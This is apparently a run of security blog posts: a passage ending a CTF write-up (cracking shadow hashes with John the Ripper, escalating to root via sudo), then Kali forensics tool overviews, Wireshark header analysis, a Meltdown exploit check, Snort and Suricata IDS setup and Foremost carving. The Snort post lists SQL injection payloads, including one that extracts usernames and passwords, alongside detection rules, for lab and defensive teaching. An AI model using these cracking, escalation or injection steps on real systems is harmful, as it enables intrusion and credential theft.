unshadow passwd shadow > cracked

Now we use john the ripper to crack the password.

john cracked

We find the password to be ‘marlinspike’ for user ‘marlinspike’

Now we login as marlinspike.

su - marlinspike

We check the sudoers list and find that we have all the access same as root so we now spawn bash as root.

sudo -l

sudo bash

Now we are a root user.

Forensics Tools in Kali

January 6, 2018, 12:57 am

≫ Next: Network Packet Forensic using Wireshark

≪ Previous: Hack the Basic Penetration VM (CTF challenge)

$

0

0

Kali linux is often thought of in many instances, it’s one of the most popular tools available to security professionals. It contains all the robust package of programs that can be used for conducting a host of security based operations. One of the many parts in its division of tools is the forensics tab, this tab holds a collection of tools that are made with the explicit purpose of performing digital forensics.

Forensics is becoming increasingly important in today’s digital age where many crimes are committed using digital technology, having an understanding of forensics can greatly increase the chance of making certain that criminals don’t get away with a crime.

This article is aimed at giving you an overview of the forensics capabilities possessed by Kali Linux.

So, let’s start with the programs as they appear in the forensics menu:

Autopsy

A tool used by the military, law enforcement and entities when it comes time to perform forensic operations. This package is probably one of the most robust ones available through open source, it combines the functionalities of many other smaller packages that are more focused in their approach in one neat application with a web browser based UI.

It is used to investigate disk images. When you click on Autopsy, it starts the service and its user interphase can be accessed on the web browser at https://9999:Localhost/autopsy.  It gives the user a full range of options required to create a new case file: Case Name, Description, Investigators Name, Host name, Host time zone, etc.

Its functionalities include – Timeline analysis, keyword search, web artifacts, hash filtering, data carving, multimedia and indicators of compromise. It accepts disk images in RAW or E01 formats and generates reports in HTML, XLS and body file depending on what is required for a particular case.

Its robustness is what makes it such a great tool, be it case management, analysis or reporting, this tool has you covered.

Binwalk  

This tool is used while dealing with binary images, it has the capability of finding embedded file and executable code by exploring the image file. It is a very powerful tool for those who know what they are doing, if used right, it can be used to find sensitive information hidden in firmware images that can be used to uncover a hack or used to find a loophole to exploit. 

This tool is written in python and uses the libmagic library, making it perfect for usage with magic signatures created for Unix file utility. To make things easier for investigators, it contains a magic signature file which holds the most commonly found signatures in firmware’s, making it easier to spot anomalies.

Bulk Extractor  

This is a very interesting tool, when an investigator is looking to extract certain kind of data from the digital evidence file, this tool can carve out email addresses, URL’s, payment card numbers, etc. This is tool works on directories, files and disk images. The data can be partially corrupted or it can be compressed, this tool will find its way into it.

The tool comes with features which help create a pattern in the data that is found repeatedly, such as URL’s, email ids and more and presents them in a histogram format. It has a feature by which it creates a word list from the data found, this can assist in cracking the passwords of encrypted files.

Chkrootkit

This program is mostly used in a live boot setting. It is used to locally check the host for any installed rootkits. It comes in handy trying to harden an endpoint or making sure that a hacker has not compromised a system.

It has the capability to detect system binaries for rootkit modification, lastlog deletions, quick and dirty string replacements and utemp deletions. This is just a taste of what it can do, the package seems simple at first glance but to a forensic investigator, its capabilities are invaluable.

Foremost  

Deleted files which might help solve a data incident? No problem, Foremost is an easy to use open source package that can carve data out of formatted disks. The filename itself might not be recovered but the data it holds can be carved out.

Foremost was written by US Air Force special agents. It can files by referencing a list of headers and footers even if the directory information is lost, this makes for fast and reliable recovery.

Galleta  

When following a trail of cookies, this tool will parse them into a format that can be exported into a spreadsheet program.

Understanding cookies can be a tough nut to crack, especially if the cookies might be evidence in a cybercrime that was committed, this program can lend a hand by giving the capability to structure the data in a better form and letting you run it through an analysis software, most of which usually require the data to be in some form of a spreadsheet.

Hashdeep

This program is a must when dealing with hashes. Its defaults are focused on MD5 and SHA-256. It can be existing files that have moved in a set or new files placed in a set, missing files or matched files, Hashdeep can work with all these conditions and give reports that can be scrutinized, it is very helpful for performing audits.

One of its biggest strengths is performing recursive hash computations with multiple algorithms, which is integral when time is of the essence.

Volafox

This is a memory analysis tool that has been written in Python, it is focused towards memory forensics for MAC OS X. It works on the Intel x86 and IA-32e framework. If you’re trying to find malware or any other malicious program that was or is residing on the system memory, this is the way to go.

Volatility  

Probably one of the most popular frameworks when it comes to memory forensics. This is a python based tool that lets investigators extract digital data from volatile memory (RAM) samples. It is compatible to be used with majority of the 64 and 32 bit variants of windows, selective flavors of Linux distros including android. It accepts memory dumps in various forms, be it raw format, crash dumps, hibernation files or VM snapshots, it can give a keen insight into the runtime state of the machine, this can be done independently of the hosts investigation.

Here’s something to consider, decrypted files and passwords are stored in the RAM, and if they are available, investigating files that might be encrypted in the hard disk can be a lot easier and the overall time of the investigation can be considerably reduced.

We will be following up this particular article with an in-depth review of the tools we have mentioned, with test cases.

Have fun and stay ethical.

                                   

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

Network Packet Forensic using Wireshark

January 6, 2018, 9:31 am

≫ Next: Check Meltdown Vulnerability in Any CPU

≪ Previous: Forensics Tools in Kali

$

0

0

Today we are going to discuss “TCP Forensic”  by covering some important track such as how Data is transferring between two nodes, what is “OSI 7 layer model” and Wireshark stores which layers information when capture the traffic between two networks.

As we know for transferring the data from one system to other we need a network connection which can be wired or wireless connection. But in actually transmission of data is not only depends upon network connection apart from that it involves several phases for transmitting data from one system to another which was explained by OSI model.

OSI stands for Open Systems Interconnection model which is a conceptual model that defines and standardizes the process of communication between sender’s and receiver’s system. The data is transfer through 7 layers architecture where each layer has a specific function in transmitting data over next layer.  

Now have a look over given below image where we had explained the functionality of each layer in OSI model. So when data is transmitted by sender’s network then it will go in downward direction and data move from application layer to physical layer whereas when receiver will receive the transmitted data it will come in upward direction from physical layer to application layer.

Flow of Data from Sender’s network: Application >Presentation > Session> Transport > Network > Data Link > Physical

Flow of Data from Receiver’s network: Physical > Data Link > Network > Transport > Session> Presentation > Application

Examine Layers captured by Wireshark

Basically when a user opens any application for sending or receiving Data then he directly interacts with application layer for both operations either sending or receiving of data. For example we act as client when use Http protocol for uploading or Downloading a Game; FTP for downloading a File; SSH for accessing the shell of remote system.

While connecting with any application for sharing data between server and client we make use of Wireshark for capturing the flow of network traffic stream to examine the OSI model theory through captured traffic.

From given below image you can observe that wireshark has captured the traffic of four layers in direction of source (sender) to destination (receiver) network.

Here it has successfully captured Layer 2> Layer 3> Layer 4 and then Layer 7 information.

Ethernet Header (Data Link)

Data link layer holds 6 bytes of Mac address of sender’s system and receiver’s system with 2 bytes of Ether type is used to indicate which protocol is encapsulated i.e. IPv4/IPv6 or .

In wireahark Ethernet II layer represent the information transmitted over data link layer. From given below image you can observed that highlighted lower part of wireshark is showing information in Hexadecimal format where the first row holds information of Ethernet headers details.

So here you can get source and destination Mac address which also available in Ethernet Header.

The row is divided into three columns as described below: 

Ethernet header 14 bytes	Destination MAC Address 6 Bytes	Source MAC Address 6 Bytes	Ether Type 2 Bytes
Bits Color	Gray	Light Green	Pink
Hexadecimal value	Fc:aa:14:6a:9a:a2	00:0c:29:d1:8e:0c	0800

As we know Mac address of system is always represents in Hexadecimal format but Ether type are generally categories in given below ways.

Ether Type	Hexadecimal Value
ARP: Address Resolution Protocol	0x0806
IPv4: Internet Protocol version 4	0x0800
IPv6: Internet Protocol version 6	0x86dd
IEEE 802.1Q	0x8100

Once again if you notice given below image then you can observe the highlighted text in Pink color is showing hex value 08 00 which indicates that here IPv4 is used.

IP Header (Network Layer)

IP header in wireshark described the network layer information which is also known as backbone of OSI model as it holds Internet Protocol version 4 complete details. Network layer divides data frame into packets and define its routing path through some hardware devices such as routers, bridges, and switches. These packets are identified through their logical address i.e. source or destination network IP address.

In Image of wireshark I have highlighted six most important values which contain vital information of a data packet and this information always flow in same way as they are encapsulated in same pattern for each IP header.

Now here 45represent IPv4 header length while 40 is time to live (TTL) of packet and 06 is hex value for TCPprotocol which means these values get change any things change i.e. TTL, Ipv4 and Protocol.

Therefore you can take help of given below table for examine TTL value for different operating system. 

Operating System	Hex Value TTL	Decimal value TTL
Windows	80	128
Linux	40	64
MAC	39	57

Similarly you can take help of given below table for examine Protocol value for different operating system.

Protocol	Hex Value	Decimal Value
ICMP	1	1
TCP	6	6
EGP	8	8
UDP	11	17

From given below image you can observe Hexadecimal information of IP header field and using given table you can study these value to obtain their original value.

IP header (20 bytes)	Header length	Total Length	TTL	Protocol	Source IP	Destination IP
Bits Color	Red	Orange	Yellow	Dark Green	Dark Brown	Black
Hex Value	45	3c	40	06	C0.a8.01.68	C0.a8.01.65
Decimal value	69	60	64	6	192.168.1.104	192.168.1.105

TCP Header (Transport layer)

Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) and Internet Control Message protocol (ICMP) are the major protocols as it gives host-to-host connectivity at the Transport Layer of the OSI model. It is also known as Heart of OSI model as it play major role in transmitting errors free data.

By examine Network Layer information through wireshark we found that here TCP is used for establishing connection with destination network.

We knew that a computer communicates with another device like a modem, printer, or network server; it needs to handshake with it to establish a connection.

TCP follow Three-Way-Handshakesas describe below:

·         Client sends a TCP packet to the server with the SYN flag set.

·         Server responds to the client request with the SYN and ACK flags set.

·         Client completes the connection by sending a packet with the ACK flag set

Structure of TCP segment

Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains mandatory fields, and an optional extension field.

Source Port	The 16-bit source port number, Identifies the sending port.
Destination Port	The 16-bit destination port number.Identifies the receiving port
Sequence Number	The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1.
Acknowledgment Number	If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive.
Data Offset	The number of 32-bit words in the TCP header. It indicates where the data begins.
Reserved	Six bits reserved for future use; must be zero.
Flags	CWR, ECE, URG, ACK, PSH, RST, SYN, FIN
Window	Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field that the receiver (the sender of this segment) is willing to accept.
Checksum	The 16-bit one's complement of the one's complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero.
Urgent Pointer	Points to the first data octet following the urgent data. Only significant when the URG control bit is set.
Options	Just as in the case of IP datagram options, options can be either: – A single byte containing the option number – A variable length option in the following format
Padding	The TCP header padding is used to ensure that the TCP header ends and data begins on a 32 bit boundary.  The padding is composed of zeros.

Different Types of TCP flags

TCP flags are used within TCP header as these are control bits that specify particular connection states or information about how a packet should be set. TCP flag field in a TCP segment will help us to understand the function and purpose of any packet in the connection. 

List of flags	Description	Hex Value	Decimal Value
CWR	Congestion Window Reduced (CWR) flag is set by the sending host to shows that it received a TCP segment with the ECE flag set	128	80
ECE	ECN-Echo indicate that the TCP peer is ECN capable during 3-way handshake	64	40
URG	Indicates that the urgent pointer field is significant in this segment.	32	20
ACK	Indicates that the acknowledgment field is significant in this segment.	16	10
PSH	Push function to transfer data	08	08
RST	Resets the connection.	04	04
SYN	Synchronizes the sequence numbers.	02	02
FIN	Last packet from sender which means there is no more data.	01	01
NS	Nonce Sum flag used for concealment protection.	00	00

From given below image you can observe Hexadecimal information of TCP header field and using given table you can study these value to obtain their original value.

Sequence and acknowledgement numbers are is major part of TCP, and they act as a way to guarantee that all data is transmitted consistently since all data transferred through a TCP connection must be acknowledged by the receiver in a suitable way. When an acknowledgement is not received, then the sender will again send all data that is unacknowledged.

TCP Header	Bits Color	Hex Value	Decimal value
Source Port	Pink	ed f2	60914
Destination Port (HTTP)	Lemon Yellow	00 50	80
Sequence Number	Dark Brown	8c 44 36 e7	2353280743
Acknowledgment Number	Grey	00 00 00 00	0
Flag (SYN)	Dark Yellow	02	02
Window size	Green	72 10	29,200
Checksum	Orange	84 4c	33,868
Urgent Pointer	Light Brown	00 00	00
Options	Red	*	*

Using given below table you can read Hex value of other Port Number and their Protocol services. Although these services operate after getting acknowledgement from destination network and explore at application layer OSI model.

In this way you can examine every layer of Wireshark for Network Packet Forensic.

Ports Number	Services	Hex Value	Decimal Value
21	FTP	15	21
22	SSH	16	22
23	Telnet	17	23
25	SMTP	19	25
53	DNS	35	53
80	HTTP	50	80

Check Meltdown Vulnerability in Any CPU

January 9, 2018, 7:46 am

≫ Next: Detect SQL Injection Attack using Snort IDS

≪ Previous: Network Packet Forensic using Wireshark

$

0

0

Hello Friends!! You must be heard of the latest vulnerbility “Meltdown” which has been discovered almost in every CPU having intel processessor, from this linkyou can check list of vulnerable CPU discription. Today we are going to disccuss how to “Check Metltadown vulnerability in any CPU” by using a script.

From Wikipedia

Meltdown is a hardware vulnerability affecting Intel x86 microprocessors and some ARM-based microprocessors. It allows a rogue process to read any physical, kernel or other process's mapped memory, regardless of whether or not it should be able to do so. It allows an unauthorized process to read data from any address that is mapped to the current process's memory space, because instruction pipelining in the affected processors means that the data from the unauthorized address will almost always be temporarily loaded into the CPU's cache during speculative execution, from which it can be recovered using other techniques, even if the original read instruction eventually fails due to privilege checking and never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process and rely on privilege checking to prevent unauthorized access, Meltdown effectively allows a rogue process to read any physical, kernel or other process's mapped memory, regardless of whether or not it should be able to do so.Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs and others), including a wide range of networking equipment.

Let’s start!!

Open the terminal and type given below command to download the script form git hub. It can only dump linux_proc_banner which is work as an interface for internal data structures in the kernel and it is used to get information regarding the system and to change certain kernel Process.

git clone https://github.com/paboldin/meltdown-exploit.git 

From given below image you can observe I had successfully download this script in my Linux machine.

Now explore the downloaded folder in terminal now run the command “make” for compiling the program file before running the script.

Now run the script by executing given below command which will identify the state of vulnerability by read its memory space.

./run.sh

From given below image you can observe where it is vulnerable ON has dumped the complete detail of CPU Processor. So here it has shown some details such as:

Vendor Id: Vendor ID or VID is unique number assign to a Hardware to identify it on which system it has been installed.

CPU family: Same functionality Processors are categories into same family, here CPU family 6 means indicate a model from Pentium Pro family.

Model:Indicates model number of CPU family.

Model name:Holds Model name of Processor

Stepping: It is used identify the version of microprocessor

Microcode: it is a lowest instruction set permanently to control the microprocessor

CPU MHz:Describe Usage of CPU.

Cache size:Define the size of cache memory.

You can also verify above result by executing given below command which is used for obtaining details of system information.

Detect SQL Injection Attack using Snort IDS

January 11, 2018, 8:01 am

≫ Next: How to Configure Suricata IDS in Ubuntu

≪ Previous: Check Meltdown Vulnerability in Any CPU

$

0

0

Hello friends!! Today we are going to discuss how to “Detect SQL injection attack” using Snort but before moving ahead kindly read our previous both articles related to Snort Installation (Manually or using apt-respiratory)and its rule configuration to enable it as IDS for your network.

Basically In this tutorial we are using snort to capture the network traffic which would analysis the SQL Injection quotes when injected in any web page to obtain information of database system of any web server. Snort will generate the alert for malicious traffic when caught those traffic in its network and network administers will immediately get attentive against suspicious traffic and could take effective action against the attacking IP. 

Requirement

IDS: Snort (Ubuntu)

Web application: Dhakkan

You can configure your own web server by taking help of our article “Configure Web server for penetration testing”

Let’s Begin!!

Identify Error Based SQL injection

As we know in Error based SQL injections the attacker use single quotes (‘) or double quotes (“) to break down SQL query for identify its vulnerability. Therefore be smart and add a rule in snort which will analyst Error based SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database.

Execute given below command in ubuntu’s terminal to open snort local rule file in text editor.

sudo gedit /etc/snort/rules/local.rules

Now add given below line which will capture the incoming traffic coming on any network IP via port 80.

alert tcp any any -> any 80 (msg: “Error Based SQL Injection”; content: “%27” ; sid:100000011; )

alert tcp any any -> any 80 (msg: “Error Based SQL Injection”; content: “22” ; sid:100000012; )

If you read above rule you can notice that I had applied filter for content “%27” and %22 are URL encoded format use in browser for single quotes(‘) and double quotes (“)  respectively at the time of execution of URL.

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now test your above rule by making Error based sql injection attack on web application “Dhakkan”, therefore open the server IP in web browser and use single quotes (‘) for identify SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-1/?id=1’

For more detail on Error Based SQL injection read our previousarticle.

Now when attacker will execute malicious quotes in browser for testing Error Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for Error Based sql injection when capture malicious quotes.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Testing Double Quotes

Now again open the server IP in web browser and use double quotes (“) for identify SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-4/?id=1”

Now when attacker will execute malicious quotes in browser for testing Double quotes SQL injection then the IDS of the network should also capture this content and will generate the alert.

From given image you can observe the snort has gerenated alert for Error Based sql injection when capture malicious quotes.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming from 192.168.1.21 on port 80.

Boolean Based SQL injection

As we know in Boolean based SQL injections the attacker use AND /OR  operators  where attacker will try to confirm if the database is vulnerable to Boolean SQL Injection by evaluating the results of various queries which return either TRUE or FLASE.

Now add a rule in snort which will analyst Boolean based SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database. Here I had applied filter for content “and” & “or” to be captured. Here nocasedenotes not case sensitive it can be as AND/and, OR/or.

alert tcp any any -> any 80 (msg: “AND SQL Injection”; content: “and” ; nocase; sid:100000060; )

alert tcp any any -> any 80 (msg: “OR SQL Injection”; content: “or” ; nocase; sid:100000061; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in web browser and use AND operator for identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1’ AND 1=1 --+

For more detail on Boolean Based SQL injection read our previousarticle.

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

Testing OR Operator

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content AND.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Again open the server IP in web browser and use OR operator to identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-8/?id=1’ OR 1=1 --+

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content OR.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Encoded AND/OR

Similarly in given below rule I had applied filter for content “%26%26” and “%7c%7c” are URL encoded format use in browser for && and || respectively at the time of execution of URL.

alert tcp any any -> any 80 (msg: “AND SQL Injection”; content: “and” ; nocase; sid:100000008; )

alert tcp any any -> any 80 (msg: “OR SQL Injection”; content: “or” ; nocase; sid:100000009; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Again open the server IP in web browser and use && operator for identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1’ %26%26 1==1 --+

For more details read our previousarticle

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content %26%26.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Testing Encoded OR Operator

Again open the server IP in web browser and use || operator for identify Boolean SQL injection vulnerability as shown below.

192.168.1.20/sqli/Less-25/?id=1’ %7C%7C 1==1 --+

Now when attacker will execute malicious quotes in browser for testing Boolean Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our calculation from given image you can observe the snort has gerenated alert for Boolean Based sql injection when captured content %7C %7C.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Identify Form Based SQL injection

The Form Based SQL injection also known as “Post Error based SQL injection” because the attacker executes malicious quotes inside Login form of a web page that contains text field for username and password to login inside web server.

Therefore now add a rule in snort which will analyst Form based SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database.

alert tcp any any -> any 80 (msg: “Form Based SQL Injection”; content: “%27” ; sid:1000003; )

 If you read above rule you can notice that I had applied filter for content “%27” to be captured; turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

I had used single quotes (‘) to break the query inside the text field of username then click on submit.

Username:      ’

From the given screenshot you can see we have got error message (in blue colour) which means the database is vulnerable to SQL injection. 

For more detail on Form Based SQL injection read our previousarticle.

Now when attacker will execute malicious quotes in browser for testing Form Base SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for Form Based sql injection when capture malicious quotes.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Identify Order by SQL injection

In order to identify number of column in database the un-trusted user may use order by clause which will arrange the result set in ascending or descending orderof the columns used in the query.

Now add a rule in snort which will analyst order by SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database. Here again that I had applied filter for content “order” to be captured.

alert tcp any any -> any 80 (msg: “Order by SQL Injection”; content: “order” ; sid:1000005; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in web browser and use string order by for identify column of database as shown below.

192.168.1.20/sqli/Less-1/?id=1′ order by 1,2,3 --+

Now when attacker will execute malicious string in browser for testing order by SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for order by sql injection when capture malicious string.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Identify UNION SELECT SQL injection

We all know in Error base SQL injection attacker may use the UNION operator to combine the result-set of two or more SELECT statements. Therefore add a rule in snort which will analyst Union select SQL injection on the server when someone try to execute SQL query in your network for unprivileged access of database. Here again that I had applied filter for content “union” to be captured.

alert tcp any any -> any 80 (msg: “UNION SELECT SQL Injection”; content: “union” ; sid:1000006; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

Now again open the server IP in web browser and use string order by for identify column of database as shown below.

192.168.1.20/sqli/Less-1/?id=-1′ union select 1,2,3 --+

Now when attacker will execute malicious string in browser for testing Union select SQL injection then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for union select sql injection when capture malicious string.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

Identify Group_concat SQL injection

We know that using Group concat statement along with union select is quite dangerous query used extracting details of records of database such as username and password of admin panel. Therefore to capture such suspicious activity in your network add given below rule in local rule file. Here I had applied filter for content: “group_concat” to be captured.

alert tcp any any -> any 80 (msg: “Group Concat SQL Injection”; content: “group%20concat” ; sid:1000007; )

Turn on IDS mode of snort by executing given below command in terminal:

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i eth0

So when un-trusted user will execute something as given below in web browser for retrieving information from inside the database.

192.168.1.21/sqli/Less-1/?id=-1’ union select 1,group_concat(username),group_concat(password) from users –+

Then the IDS of the network should also capture this content and will generate the alert.

As per our prediction from given image you can observe the snort has gerenated alert for Group Concat sql injection when capture malicious string.

So when the network admin get alert from IDS on the basis of it  he can take action against attacking IP, as shown in given image the malicous traffic is coming form 192.168.1.21 on port 80.

How to Configure Suricata IDS in Ubuntu

January 12, 2018, 8:43 am

≫ Next: Forensic Data Carving using Foremost

≪ Previous: Detect SQL Injection Attack using Snort IDS

$

0

0

Suricata is developed by the Open Information Security Foundation. Suricata is a high performance Network IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF and its supporting vendors.

Features

IDS / IPS

Suricata implements a complete signature language to match on known threats, policy violations and malicious behaviour. Suricata will also detect many anomalies in the traffic it inspects. Suricata is capable of using the specialized Emerging Threats Suricata ruleset and the VRT ruleset.

High Performance

A single Suricata instance is capable of inspecting multi-gigabit traffic. The engine is built around a multi threaded, modern, clean and highly scalable code base. There is native support for hardware acceleration from several vendors and through PF_RING and AF_PACKET.

Automatic protocol detection

Suricata will automatically detect protocols such as HTTP on any port and apply the proper detection and logging logic. This greatly helps with finding malware and CnC channels.

NSM: More than an IDS

Suricata can log HTTP requests, log and store TLS certificates, extract files from flows and store them to disk. The full pcap capture support allows easy analysis. All this makes Suricata a powerful engine for your Network Security Monitoring (NSM) ecosystem.

From: https://suricata-ids.org/

Lets Begin!!

We had chosen ubuntu operating system for installation and configuration of suricata. Earlier than installing suricata in your machine, you should need to install necessary dependencies of ubuntu. Therefore open the terminal and type given below command to install pre-requisites by a making update.

apt-get update

It is an easiest way to install and configure the suricata in your system because it’s entire requirement whether it is suricata rules directory or logging directory every packages is are stored by apt repository. Enter given below command to begin the suricata installations. 

apt-get install suricata -y

Now we need to create an empty text document file for our local rules inside rule folder of suricata

touch /etc/suricata/rules/local.rules

After then open the configuration file using gedit for making some changes inside.

gedit /etc/suricata/suricata-debian.yaml

The two most important steps we need to perform here:

1.       Commentall others available file of rules so that only yours local rule file will be in priority.

2.       Mention the local.rules under the rule files list.

Now add the network CIDR for which IDS will filter the incoming and outgoing traffic as shown in given below image.

Here we had set HOME_NET 192.168.1.0/24

Now open the local rule file to add your own network filtering rules in side it

gedit /etc/suricata/rules/local.rules

Now if you are not much aware about its rule configuration then you need not to be worry about it because implementing rule in suricata is as similar as in snort. For help open this Linkto get details of IDS rule implementation.

alert icmp any any -> 192.168.1.111 any (msg: “ICMP detected”; sid:10000001;)

The above rule will generate an alert when found any network IP sending ICMP packets in our network by pinging IP 192.168.1.111.

Now execute following command to make GRO (Generic receive offload) disable on specific interfaces with help of Ethtool.

ethtool -K ens33 gro off

Then again turn On NIDS mode of surictata using given below command.

suricata -c /etc/suricata/suricata-debian.yaml -i ens33

Now let’s ping the IP: 192.168.1.111 from another system to test whether our NIDS will generate alert for ICMP packet or not. From given image you can read the command: ping 192.168.1.111 where you can observe it has sent 3 ICMP request packets.  

Basically suricata alert logs are generated under var/log and you can use given below command to read the captured logs.

tail -f /var/log/suricata/

As result suricata with NIDS mode had capture only 3 ICMP packets from IP 192.168.1.102 which you can observe from given below image that generated alert for “ICMP Detected”, this happens because in above rule we had applied “->”one-directional operators which mean it will only capture traffic coming from source IP to destination IP.

Here you can perceive that both two packets of ICMP is coming from 192.168.1.102 to 192.168.1.111 which means it has only captured ICMP Echo-request packets form source IP. 

Forensic Data Carving using Foremost

January 13, 2018, 9:06 am

≫ Next: Post Exploitation in Windows using dir Command

≪ Previous: How to Configure Suricata IDS in Ubuntu

$

0

0

Foremost is a program that is used to carve data from disk image files, it is an extremely useful tool and very easy to use.

For the purpose of this article we have used an Ubuntu disk image file and the process has been repeated twice. The purpose of doing so was to see if Foremost can carve data out of incomplete disk images as well. We have used Kali Linux but if you want you can install Foremost on pretty much any distro of Linux.

Here’s how it was done:

Navigate to the Applicationsmenu in Kali, Forensics is option 11. The fifth option from top in the Forensics menu is Foremost. Click on it and let’s get to carving some data!!

Foremost starts and shows you the options you have at your disposal.

In order to keep things simple, you first want to navigate to the Desktop using “cd Desktop”.

Next, make a folder on the desktop by the name of “recov”. This isn’t a mandatory step, it just makes things easier to access by making a new folder where the carved data will be stored.

We will be dealing with the disk image of a flash drive partition, so let’s make one using the “dd” command. The dd command can be used to copy files and with the option of converting the data format in the process.

In the interest of thoroughness we have copied .docx, .jpeg, .png, .zip, .pdf and .avi files onto the partition from which we will be making our disk image.

Now let’s make a disk image.

In a new terminal window, type the following “fdisk –l | grep /dev/”. This command will show you the disk partitions available to you without any clutter.

The partition we are concerned with is /dev/sbd2, this was specially allocated 10 MB of space so that the imaging process is quick.

The command to create the disk image is “dd if=/dev/sdb2 of=disk.img”. Here, “dd” is the utility we are using, “if=” is to denote the input destination and “of=” is to denote the output destination and name of the image file we are creating.

We have not specified any output destination, but, just the name for the image file. The image file will be created in the Home directory by default. Copy the disk image file from here and place it on the desktop.

Let’s navigate back to the terminal where we have Foremost running and start the file carving process.

This disk image file will be carved for .jpeg, .png, .zip, .pdf and .avi  file formats. We will not be instructing Foremost to carve the .docx but, since one exists in the .zip we have placed inside the disk image, it will do so automatically.

Type the following “foremost -t jpeg,png,zip,pdf,avi -i disk.img -o recov –v”.

To break this down “-t” is setting the file types we want to carve out of the disk image, here those are .jpeg and .png.

“-i” is specifying the input file, the "disk.img” that is placed on the desktop.

“-o” is telling Foremost where we want the carved files to be stored, for that we have the “recov” folder on the desktop that we made earlier.

“-v” is to tell Foremost to log all the messages that appear on screen as the file is being carved into a text file in the output folder (recov)as an audit report.

That’s all it takes for Foremost to start digging into the disk image. The process looks like this.

Once Foremost is done carving the disk image, it shows you the result: that’s is, how many of which file types have been carved. All It took was asecond, to get the job done.

Now open the output (recov) folder and you will see an audit report and six folders which will be named by the file types we invoked Foremost to carve for us.

First, the audit report. It shows us the particulars of the scan, which file types were carved, from which image file, the size of the image file, where it was located, where the output folder was located, etc. Let’s have a look.

The end of the report contains shows the total files extracted with more particulars.

We will open one file from the jpg folder to see what we have.

One from the pngfolder.

Inside the docxfolder.

Inside the pdffolder. 

Now the avi folder

And finally the zip folder.

As you can see, Foremost was successfully able to carve files out of the disk image file and give us the results. Let’s put it to the test.

This a very interesting tool and its simplicity is what makes it stand out.

The only issue I could see with this is that the file names are not recovered, which can make the search process very tedious unless the option of automation and a frame of reference are available.

That being said, in forensics, just being able recover the files without opening or extracting disk image itself is a huge advantage, the reason for saying so is that, if you do extract or open the disk image you never know what might be waiting for you inside, this way you have more control over the entire investigation process. Enjoy using this tool.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

